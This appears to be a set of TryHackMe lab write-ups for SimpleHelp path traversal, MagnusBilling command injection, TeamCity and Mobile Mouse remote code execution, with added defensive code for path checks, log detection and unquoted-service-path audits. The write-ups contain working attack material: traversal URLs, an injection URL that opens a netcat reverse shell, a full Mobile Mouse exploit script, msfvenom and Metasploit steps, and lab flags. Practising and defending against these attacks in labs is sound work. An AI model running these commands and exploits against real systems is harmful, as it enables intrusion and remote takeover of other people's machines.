Try Hack Me Write-ups
Solutions to some Try Hack Me rooms.
Write-up / THM / SimpleHelp: CVE-2024-57727
by: alfreddgreat
Get the Python proof-of-concept script for the vulnerability from https://github.com/imjdl/CVE-2024-57727.
root@ip-10-10-65-98:~# git clone https://github.com/imjdl/CVE-2024-57727
Change directory to the downloaded CVE folder.
root@ip-10-10-65-98:~/CVE-2024-57727# cd CVE-2024-57727/
Run the script against the target:
root@ip-10-10-65-98:~/CVE-2024-57727# python3 poc.py http://10.10.32.37
Excerpt from poc.py showing the request it builds (the rest of the function is in the repository):
import ssl

def send_path_traversal_request(url: str) -> dict | None:
    """
    Send a path traversal request and get the response.

    Args:
        url (str): Target URL address
    Returns:
        dict: Dictionary containing response information (status code, response content, etc.)
        None: Returned if the request fails
    """
    url = url + "/toolbox-resource/../resource1/../../configuration/serverconfig.xml"
    context = ssl._create_unverified_context()
    # Default request headers
    default_headers = {
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept': '*/*',
        'Connection': 'keep-alive'
    }
    # ... (excerpt ends here)
root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/serverconfig.xml
root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/flag.txt
THM{9ND23PVA}
"Choose your path wisely, but your shoes comfortably."
"Traverse lightly, laugh loudly."
root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.189.219/toolbox-resource/../secmsg/../../configuration/flag.txt
THM{X8733EEZ}
"Some paths are meant to be traversed; others just lead to a 404."
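As an added illustration, not code from the write-up or from SimpleHelp: the defect class behind this traversal in simplified form. A handler that checks the /toolbox-resource/ prefix on the raw request (which curl --path-as-is delivers with its dot segments intact) and only then joins the remainder onto its directory is shown next to a version that canonicalises first. The document root, prefix and the naive handler are assumptions, not SimpleHelp's actual code; the request paths are the ones used above.

```python
import posixpath
from urllib.parse import unquote

# Assumed layout (not taken from SimpleHelp): the handler serves static files
# from WEB_ROOT and the application's configuration lives outside it.
WEB_ROOT = "/opt/app/toolbox-resource"
PREFIX = "/toolbox-resource/"


def naive_resolve(request_path: str) -> str:
    """Simplified vulnerable pattern: check the prefix on the raw request,
    then append the remainder. The '..' segments survive the join and the
    filesystem resolves them, so the result can leave WEB_ROOT."""
    if not request_path.startswith(PREFIX):
        raise PermissionError("outside handler prefix")
    joined = posixpath.join(WEB_ROOT, request_path[len(PREFIX):])
    return posixpath.normpath(joined)        # what the OS would actually open


def canonical(request_path: str) -> str:
    """Decode twice (catches %252e) and collapse '.' and '..' segments.
    normpath discards any '..' that would climb above '/'."""
    return posixpath.normpath(unquote(unquote(request_path)))


def safe_resolve(request_path: str):
    """Hardened version: canonicalise, then check the prefix, then confirm
    the final filesystem path is still inside WEB_ROOT. None means reject."""
    path = canonical(request_path)
    if not path.startswith(PREFIX):
        return None
    target = posixpath.normpath(posixpath.join(WEB_ROOT, path[len(PREFIX):]))
    if posixpath.commonpath([WEB_ROOT, target]) != WEB_ROOT:
        return None
    return target


if __name__ == "__main__":
    payload = "/toolbox-resource/../resource1/../../configuration/serverconfig.xml"
    print("naive:", naive_resolve(payload))                 # escapes the root
    print("safe :", safe_resolve(payload))                  # None
    print("safe :", safe_resolve("/toolbox-resource/css/app.css"))
```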
Write-up / THM / Billing
by:
Start the Virtual Machine
Run an nmap scan against the VM
From the nmap scan: nmap -sS -sC -sV IP_THM_VM_machine
Ports 22, 80, and 3306 are open
VM machine is a Debian Linux
Connect to port 80 using a web browser
First start a listener on the attacking machine:
nc -lnvp 9001
Then request the vulnerable icepay.php endpoint with a command appended to the democ parameter (the advisory below explains why this parameter reaches exec()); the injected nc connects back to the listener:
10.10.233.21/mbilling/lib/icepay/icepay.php?democ=/dev/null; nc -c sh 10.10.209.29 9001
Once the shell arrives, upgrade it to an interactive one:
python -c 'import os; os.system("/bin/sh")'
Reference for the privilege escalation step (fail2ban): https://www.linkedin.com/pulse/linux-privesc-fail2ban-exploit-ahnaf-abrar-hasin/
Advisory for the command injection (reproduced below): https://eldstal.se/advisories/230327-magnusbilling.html
Security advisory
A command injection vulnerability exists in magnusbilling versions 6 and 7. The vulnerability allows an unauthenticated user to execute arbitrary OS commands on the host, with the privileges of the web server.
Affected products
magnusbilling 7 up to and including commit 7af21ed620
magnusbilling 6 (all versions)
Steps to reproduce
The following proof of concept uses a harmless sleep 30 command as a payload.
- Visit
/mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%2030;ls%20a
- Observe that the page takes 30 seconds to load
- Visit
/mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%203;ls%20a
- Observe that the page takes only 3 seconds to load
Cause
A piece of demonstration code is present in lib/icepay/icepay.php, with a call to exec() at line 753. The parameter to exec() includes the GET parameter democ, which is controlled by the user.
Impact
An unauthenticated user is able to execute arbitrary OS commands. The commands run with the privileges of the web server process, typically www-data. At a minimum, this allows an attacker to compromise the billing system and its database.
Proposed Mitigation
Remove the demo code from icepay.php.
History
- 2023-06-26: CVE-2023-30258 assigned
- 2023-03-28: Initial report removed by maintainer
- 2023-03-27: Vulnerability fixed
- 2023-03-27: Vulnerability reported
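As an added detection example, not part of the write-up or of either advisory: a scan over constructed access-log lines that flags both request patterns seen on this page, dot segments (raw or percent-encoded) in the request path as in the SimpleHelp traversal above, and shell metacharacters in the democ parameter of icepay.php as in the MagnusBilling injection. The log lines and client IPs are constructed samples; the request targets mirror the ones used in the two write-ups.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Apache "combined" format (client IPs made up).
SAMPLE_LOG = """\
10.10.14.5 - - [30/Mar/2025:22:19:01 +0000] "GET /toolbox-resource/css/app.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.10.14.5 - - [30/Mar/2025:22:19:07 +0000] "GET /toolbox-resource/../resource1/../../configuration/serverconfig.xml HTTP/1.1" 200 2044 "-" "curl/8.5.0"
10.10.14.5 - - [30/Mar/2025:22:19:09 +0000] "GET /toolbox-resource/%2e%2e/secmsg/%2e%2e/%2e%2e/configuration/flag.txt HTTP/1.1" 200 97 "-" "curl/8.5.0"
10.10.14.6 - - [30/Mar/2025:22:20:15 +0000] "GET /mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%2030;ls%20a HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.6 - - [30/Mar/2025:22:20:55 +0000] "GET /mbilling/lib/icepay/icepay.php?democ=/dev/null;nc%20-c%20sh%2010.10.209.29%209001 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.7 - - [30/Mar/2025:22:21:00 +0000] "GET /mbilling/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SHELL_META = re.compile(r"[;|&`$]")      # characters that end or chain a shell command


def query_params(query: str) -> dict:
    """Split the query on '&' only; ';' must stay inside the value (it is the payload)."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote(value))
    return params


def classify(line: str):
    """Return a finding dict for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    parts = urlsplit(target)
    path = unquote(unquote(parts.path))      # decode twice to catch %252e%252e
    findings = []
    if "/../" in path + "/" or path.startswith("../"):
        findings.append("path-traversal")
    if parts.path.endswith("/lib/icepay/icepay.php"):
        if any(SHELL_META.search(v) for v in query_params(parts.query).get("democ", [])):
            findings.append("icepay-democ-injection")
    if not findings:
        return None
    return {"src": m.group("src"), "status": int(m.group("status")),
            "target": target, "findings": findings}


def scan(log_text: str) -> list:
    """All suspicious lines in a log, in order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["src"], hit["status"], ",".join(hit["findings"]), hit["target"])
```

A 200 on a traversal line is the case to escalate; a 404 or 403 on the same target shows the server refused the escape.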
Write-up / THM / Brains
by: alfreddgreat
Start the Virtual Machine
Run an nmap scan against the VM
From the nmap scan: nmap -sS -sC -sV IP_THM_VM_machine
Ports 22, 80, and 50000 are open
VM machine is an Ubuntu Linux
Connect to port 80 using a web browser
The nmap output shows port 50000 is open as well, and its fingerprint reveals an HTTP server:
50000/tcp open ibm-db2?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 401
| TeamCity-Node-Id: MAIN_SERVER
| WWW-Authenticate: Basic realm="TeamCity"
| WWW-Authenticate: Bearer realm="TeamCity"
| Cache-Control: no-store
| Content-Type: text/plain;charset=UTF-8
| Date: Fri, 18 Oct 2024 01:48:03 GMT
| Connection: close
| Authentication required
| login manually go to "/login.html" page
| drda, ibm-db2, ibm-db2-das:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Fri, 18 Oct 2024 01:48:03 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
TeamCity-Node-Id: MAIN_SERVER
Connect to port 50000 using the web browser
The web server runs TeamCity version 2023.11.3 (build 147512).
Search the internet for vulnerabilities in TeamCity 2023.11.3.
This TeamCity version has a remote code execution (RCE) vulnerability.
Check whether the Metasploit Framework has a module for the TeamCity vulnerabilities CVE-2024-27198 and CVE-2024-27199.
Run msfconsole
Modules 3, 4, 5, 6, 7 and 8 can be used for CVE-2024-27198, but we do not yet know whether the target is Java, Windows, Linux or Unix.
Identify the technology behind the web server by banner grabbing or with Wappalyzer.
Wappalyzer lists Apache Tomcat under Web Servers, which means the application runs on Java.
Therefore, in msfconsole, use module 4, whose target is Java.
In the msfconsole: msf6 > use 4
Then run options to see what the exploit needs. Entries with yes in the Required column are mandatory.
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > options
RHOSTS and RPORT must be set, and LHOST must be an IP the VM can reach. Since the machine is reached over a VPN, LHOST is the VPN IP assigned to the Kali machine.
Set the following values
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set RHOSTS 10.10.170.24
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set RPORT 50000
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set LHOST 10.11.80.68
Note: 10.10.170.24 is the THM VM, 50000 is the TeamCity application port, and 10.11.80.68 is the VPN IP of the Kali machine.
Now check if the options are set successfully. Run the options command to see the set values.
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > options
Now run the exploit
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > run -j
If the prompt does not return, press Enter until the following line appears:
Meterpreter session 1 opened (10.11.80.68:4444 -> 10.10.170.24:54368) at 2024-10-17 22:38:00 -0400
Then run sessions to list the session that was created
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > sessions
One session has been created and is connected to the target machine (THM VM).
Connect to the session with the command sessions 1
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > sessions 1
Now we have a Meterpreter shell on the machine. We can move around with Meterpreter commands or drop to a system shell with the shell command.
meterpreter > shell
We are now in the target's shell. To get a proper prompt, spawn an interactive bash:
/bin/bash -i
Now we are inside the VM machine in the directory /opt/teamcity/TeamCity/bin
The question to answer on tryhackme.com: the flag is in the /home directory, where a user exists.
Change to /home and list its contents to find the user:
ubuntu@brains:/opt/teamcity/TeamCity/bin$ cd /home
ubuntu@brains:/home$ ls
The user is ubuntu.
Change directory to the user directory and get the content of the flag.txt file.
ubuntu@brains:/home$ cd ubuntu
ubuntu@brains:/home$ ls -l
ubuntu@brains:/home$ cat flag.txt
FLAG: THM{faa9bac345709b6620a6200b484c7594}
Connect to the machine at 10.10.74.225 on port 8000 using a browser.
Try Hack Me / Mouse Trap
by: alfreddgreat
root@ip-10-10-123-135:~# nmap -sS -sC -sV 10.10.162.0
root@ip-10-10-123-135:~# nmap -sS -sC -sV -O 10.10.162.0
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-30 22:19 BST
Nmap scan report for 10.10.162.0
Host is up (0.00035s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: MOUSETRAP
| NetBIOS_Domain_Name: MOUSETRAP
| NetBIOS_Computer_Name: MOUSETRAP
| DNS_Domain_Name: MOUSETRAP
| DNS_Computer_Name: MOUSETRAP
| Product_Version: 10.0.17763
|_ System_Time: 2025-03-30T21:22:42+00:00
| ssl-cert: Subject: commonName=MOUSETRAP
| Not valid before: 2024-12-08T13:53:36
|_Not valid after: 2025-06-09T13:53:36
|_ssl-date: 2025-03-30T21:23:10+00:00; 0s from scanner time.
9099/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.0 200 OK
| Server: Mobile Mouse Server
| Content-Type: text/html
| Content-Length: 326
|_ <HTML><HEAD><TITLE>Success!</TITLE><meta name="viewport" content="width=device-width,user-scalable=no" /></HEAD><BODY BGCOLOR=#000000><br><br><p style="font:12pt arial,geneva,sans-serif; text-align:center; color:green; font-weight:bold;" >The server running on "MOUSETRAP" was able to receive your request.</p></BODY></HTML>
9999/tcp open abyss?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 02:23:36:E3:FF:87 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: MOUSETRAP, NetBIOS user: <unknown>, NetBIOS MAC: 02:23:36:e3:ff:87 (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-03-30T21:22:42
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 212.34 seconds
root@ip-10-10-123-135:~# nmap --script vuln 10.10.162.0
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-30 22:04 BST
Nmap scan report for 10.10.162.0
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp open ms-wbt-server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
9099/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
9999/tcp open abyss
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:23:36:E3:FF:87 (Unknown)
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
Nmap done: 1 IP address (1 host up) scanned in 59.82 seconds
Open port 9099 in the browser.
The service/version scan above identified the service on port 9099 as Mobile Mouse Server.
Searching the internet for an exploit turns up the following GitHub repository:
https://github.com/blue0x1/mobilemouse-exploit?tab=readme-ov-file
Use the v2 version, CVE-2023-31902-v2.py:
#!/usr/bin/env python3
# Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution v2
# Date: Apr 28, 2023
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link: https://www.mobilemouse.com/downloads/setup.exe
# Version: 3.6.0.4
# Tested on: Windows 10 Enterprise LTSC Build 17763

import socket
from time import sleep
import argparse
import threading
from impacket import smbserver


def smb_server(lhost, file_to_serve):
    server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
    server.addShare("share", ".", "")
    server.start()


help = " Mobile Mouse 3.6.0.4 Remote Code Execution "
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--target", help="Target IP", required=True)
parser.add_argument("--file", help="File name to Upload", required=True)
parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")
args = parser.parse_args()

host = args.target
command_shell = args.file
lhost = args.lhost
port = 9099  # Default port

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 256)
s.connect((host, port))

smb_server_thread = threading.Thread(target=smb_server, args=(lhost, command_shell))
smb_server_thread.start()

CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")
s.send(CONN)
run = s.recv(54)

RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")
s.send(RUN)
run = s.recv(54)
sleep(0.5)

payload = f"cmd.exe /c start /B \\\\{lhost}\\share\\{command_shell}".encode('utf-8')
hex_payload = payload.hex()
SHELL = bytearray.fromhex("4B45591E3130301E" + hex_payload + "1E04" + "4b45591e2d311e454e5445521e04")
s.send(SHELL)
shell = s.recv(96)
print("Take The rose...")
sleep(30)
s.close()
Save the code above as mousemobile.py.
Now create a reverse-shell executable with msfvenom, where LHOST is the local machine's IP and LPORT the local listening port:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
mousemobile.py will make the target run shell-x64.exe.
Note that shell-x64.exe here was generated with LPORT 446.
First open a terminal and run the following command
nc -lnvp 446
Leave it open, then in a second terminal run the Python script against the Mobile Mouse service:
python3 mousemobile.py --target 10.10.162.0 --lhost 10.10.123.135 --file shell-x64.exe
The netcat listener in the first terminal should now have received the connection, giving a Windows command shell.
Get the flag from user.txt:
THM{Terry_mouse_2_rce}
Exploiting the Unquoted Path
Search for services with unquoted paths using SharpUp.exe:
C:\Users\purpletom>SharpUp.exe audit
=== SharpUp: Running Privilege Escalation Checks ===
[!] Modifialbe scheduled tasks were not evaluated due to permissions.
=== Services with Unquoted Paths ===
Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program' is modifable.
Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files' is modifable.
Service 'Mobile Mouse Service' (StartMode: Manual) has executable 'C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe', but 'C:\Program Files (x86)\Mobile Mouse\Mouse' is modifable.
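As an added audit example, not SharpUp's code or the write-up's: the check behind the SharpUp output above, computing which prefix executables Windows (CreateProcess) would try before the real service binary when ImagePath is unquoted, which directories therefore need ACLs that deny write access to standard users, and the fix of quoting the ImagePath. It assumes the ImagePath value is an .exe path with optional trailing arguments; the service path is the one SharpUp reported.

```python
import ntpath
import re

EXE_RE = re.compile(r"\.exe\b", re.IGNORECASE)


def split_image_path(image_path: str):
    """Separate the executable from any trailing service arguments.
    Assumes the executable ends in .exe; anything after it is arguments."""
    m = EXE_RE.search(image_path)
    if m is None:
        return image_path.strip(), ""
    return image_path[:m.end()].strip(), image_path[m.end():]


def hijack_candidates(image_path: str) -> list:
    """Executables that would be tried before the real one when ImagePath is
    unquoted and contains spaces. An empty list means the service is not affected."""
    exe, _ = split_image_path(image_path)
    if exe.startswith('"') or " " not in exe:
        return []
    words = exe.split(" ")
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]


def directories_to_audit(image_path: str) -> list:
    """Directories whose ACLs must not grant write access to standard users:
    the parents of the candidate executables, in search order, without repeats."""
    parents = [ntpath.dirname(c) for c in hijack_candidates(image_path)]
    return list(dict.fromkeys(parents))


def quote_image_path(image_path: str) -> str:
    """The fix: quote the executable part of ImagePath, keeping any arguments."""
    exe, args = split_image_path(image_path)
    if exe.startswith('"'):
        return image_path
    return f'"{exe}"{args}'


if __name__ == "__main__":
    # Value reported by SharpUp above.
    svc = r"C:\Program Files (x86)\Mobile Mouse\Mouse Utilities\HelperService.exe"
    for c in hijack_candidates(svc):
        print("would be tried first:", c)
    print("audit write ACLs on:", directories_to_audit(svc))
    print("fixed ImagePath:", quote_image_path(svc))
```

The three prefixes SharpUp flagged as modifiable are among the candidates this produces; quoting the path removes them all.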